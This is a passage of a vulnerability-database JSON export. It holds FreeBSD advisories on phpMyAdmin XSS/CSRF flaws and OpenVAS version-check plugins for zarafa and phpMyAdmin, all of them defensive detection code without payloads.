{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.2.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "operator": "eq"}], "description": "\nThe phpMyAdmin development team reports:\n\nMultiple XSS vulnerabilities in browse table, ENUM\n\t editor, monitor, query charts and table relations pages.\n With a crafted database, table or a primary/unique key\n\t column name it is possible to trigger an XSS when dropping\n\t a row from the table. With a crafted column name it is\n\t possible to trigger an XSS in the ENUM editor dialog. With\n\t a crafted variable name or a crafted value for unit field\n\t it is possible to trigger a self-XSS when adding a new\n\t chart in the monitor page. With a crafted value for x-axis\n\t label it is possible to trigger a self-XSS in the query\n\t chart page. With a crafted relation name it is possible to\n\t trigger an XSS in table relations page.\n\n\nXSS in view operations page.\nWith a crafted view name it is possible to trigger an\n\t XSS when dropping the view in view operation page.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-08-17T00:00:00", "title": "phpMyAdmin -- XSS vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2014-08-17T00:00:00", "id": "FBB01289-2645-11E4-BC44-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/fbb01289-2645-11e4-bc44-6805ca0b3d42.html", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T01:14:47", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.2.9.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.2.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "operator": "eq"}], "description": "\nThe phpMyAdmin development team reports:\n\nWith a crafted ENUM value it is possible to trigger an\n\t XSS in table search and table structure pages. This\n\t vulnerability can be triggered only by someone who is\n\t logged in to phpMyAdmin, as the usual token protection\n\t prevents non-logged-in users from accessing the required\n\t pages.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-10-01T00:00:00", "title": "phpMyAdmin -- XSS vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-7217"], "modified": "2014-10-01T00:00:00", "id": "3E8B7F8A-49B0-11E4-B711-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/3e8b7f8a-49b0-11e4-b711-6805ca0b3d42.html", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T01:14:48", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2014-10.php"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.2.8.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.2.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "operator": "eq"}], "description": "\nThe phpMyAdmin development team reports:\n\nXSRF/CSRF due to DOM based XSS in the micro history feature.\nBy deceiving a logged-in user to click on a crafted URL,\n\t it is possible to perform remote code execution and in some\n\t cases, create a root account due to a DOM based XSS\n\t vulnerability in the micro history feature.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-09-13T00:00:00", "title": "phpMyAdmin -- XSRF/CSRF due to DOM based XSS in the micro history feature", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-6300"], "modified": "2014-09-13T00:00:00", "id": "CC627E6C-3B89-11E4-B629-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/cc627e6c-3b89-11e4-b629-6805ca0b3d42.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2018-09-01T23:54:44", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137232.html", "2014-9768"], "pluginID": "1361412562310868164", "description": "Check for the Version of zarafa", "edition": 6, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-09-03T00:00:00", "title": "Fedora Update for zarafa FEDORA-2014-9768", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5450", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "modified": "2018-04-25T00:00:00", "id": "OPENVAS:1361412562310868164", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868164", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zarafa FEDORA-2014-9768\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868164\");\n script_version(\"$Revision: 9594 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-25 04:13:41 +0200 (Wed, 25 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-03 05:54:10 +0200 (Wed, 03 Sep 2014)\");\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for zarafa FEDORA-2014-9768\");\n\n tag_insight = \"The Zarafa Collaboration Platform is a Microsoft Exchange replacement. The\nOpen Source Collaboration provides an integration with your existing Linux\nmail server, native mobile phone support by ActiveSync compatibility and a\nwebaccess with 'Look & Feel' similar to Outlook using Ajax. Including an\nIMAP and a POP3 gateway as well as an iCal/CalDAV gateway, the Zarafa Open\nSource Collaboration can combine the usability with the stability and the\nflexibility of a Linux server.\n\nThe proven Zarafa groupware solution is using MAPI objects, provides a MAPI\nclient library as well as programming interfaces for C++, PHP and Python.\nThe other Zarafa related packages need to be installed to gain all features\nand benefits of the Zarafa Collaboration Platform (ZCP).\n\";\n\n tag_affected = \"zarafa on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-9768\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137232.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of zarafa\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"zarafa\", rpm:\"zarafa~7.1.10~4.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:53:32", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137158.html", "2014-9754"], "pluginID": "1361412562310868143", "description": "Check for the Version of zarafa", "edition": 6, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-08-31T00:00:00", "title": "Fedora Update for zarafa FEDORA-2014-9754", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5450", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "modified": "2018-04-25T00:00:00", "id": "OPENVAS:1361412562310868143", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868143", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zarafa FEDORA-2014-9754\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868143\");\n script_version(\"$Revision: 9594 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-25 04:13:41 +0200 (Wed, 25 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-31 05:52:21 +0200 (Sun, 31 Aug 2014)\");\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for zarafa FEDORA-2014-9754\");\n\n tag_insight = \"The Zarafa Collaboration Platform is a Microsoft Exchange replacement. The\nOpen Source Collaboration provides an integration with your existing Linux\nmail server, native mobile phone support by ActiveSync compatibility and a\nwebaccess with 'Look & Feel' similar to Outlook using Ajax. Including an\nIMAP and a POP3 gateway as well as an iCal/CalDAV gateway, the Zarafa Open\nSource Collaboration can combine the usability with the stability and the\nflexibility of a Linux server.\n\nThe proven Zarafa groupware solution is using MAPI objects, provides a MAPI\nclient library as well as programming interfaces for C++, PHP and Python.\nThe other Zarafa related packages need to be installed to gain all features\nand benefits of the Zarafa Collaboration Platform (ZCP).\n\";\n\n tag_affected = \"zarafa on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-9754\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137158.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of zarafa\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"zarafa\", rpm:\"zarafa~7.1.10~4.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:43:29", "references": ["https://www.phpmyadmin.net/security/PMASA-2014-10/"], "pluginID": "1361412562310112019", "description": "phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.", "edition": 4, "reporter": "Copyright (c) 2017 Greenbone Networks GmbH", "published": "2017-08-21T00:00:00", "title": "phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Linux)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-6300"], "modified": "2017-10-24T00:00:00", "id": "OPENVAS:1361412562310112019", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112019", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-6300_lin.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112019\");\n script_version(\"$Revision: 7543 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:48:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_name(\"phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-10/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks the version.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.8.1, 4.1.x before 4.1.14.4 and 4.0.x before 4.0.10.3\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.8.1, 4.1.14.4 or 4.0.10.3.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.3\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.0.10.3\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.4\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.4\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.8.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.8.1\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:44:17", "references": ["https://www.phpmyadmin.net/security/PMASA-2014-7/"], "pluginID": "1361412562310112016", "description": "phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.", "edition": 4, "reporter": "Copyright (c) 2017 Greenbone Networks GmbH", "published": "2017-08-21T00:00:00", "title": "phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4987"], "modified": "2017-10-24T00:00:00", "id": "OPENVAS:1361412562310112016", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112016", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-4987_win.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112016\");\n script_version(\"$Revision: 7543 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:18:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2014-4987\");\n script_bugtraq_id(68804);\n script_name(\"phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-7/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks the version.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.6 and 4.1.x before 4.1.14.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6 or 4.1.14.2.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.2\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.6\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:44:08", "references": ["https://www.phpmyadmin.net/security/PMASA-2014-7/"], "pluginID": "1361412562310112017", "description": "phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.", "edition": 4, "reporter": "Copyright (c) 2017 Greenbone Networks GmbH", "published": "2017-08-21T00:00:00", "title": "phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Linux)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4987"], "modified": "2017-10-24T00:00:00", "id": "OPENVAS:1361412562310112017", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112017", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-4987_lin.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112017\");\n script_version(\"$Revision: 7543 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:18:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2014-4987\");\n script_bugtraq_id(68804);\n script_name(\"phpMyAdmin 'CVE-2014-4987' Bypass Restriction Vulnerability (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-7/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a bypass restriction vulnerability via remote authentication.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks the version.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.6 and 4.1.x before 4.1.14.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6 or 4.1.14.2.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.2\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.6\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:40:53", "references": ["https://www.phpmyadmin.net/security/PMASA-2014-10/"], "pluginID": "1361412562310112018", "description": "phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.", "edition": 4, "reporter": "Copyright (c) 2017 Greenbone Networks GmbH", "published": "2017-08-21T00:00:00", "title": "phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-6300"], "modified": "2017-10-24T00:00:00", "id": "OPENVAS:1361412562310112018", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112018", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-6300_win.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112018\");\n script_version(\"$Revision: 7543 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 12:48:02 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_name(\"phpMyAdmin 'CVE-2014-6300' Cross-Site Scripting (XSS) Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-10/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a cross-site scripting (XSS) vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks the version.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.8.1, 4.1.x before 4.1.14.4 and 4.0.x before 4.0.10.3\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.8.1, 4.1.14.4 or 4.0.10.3.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 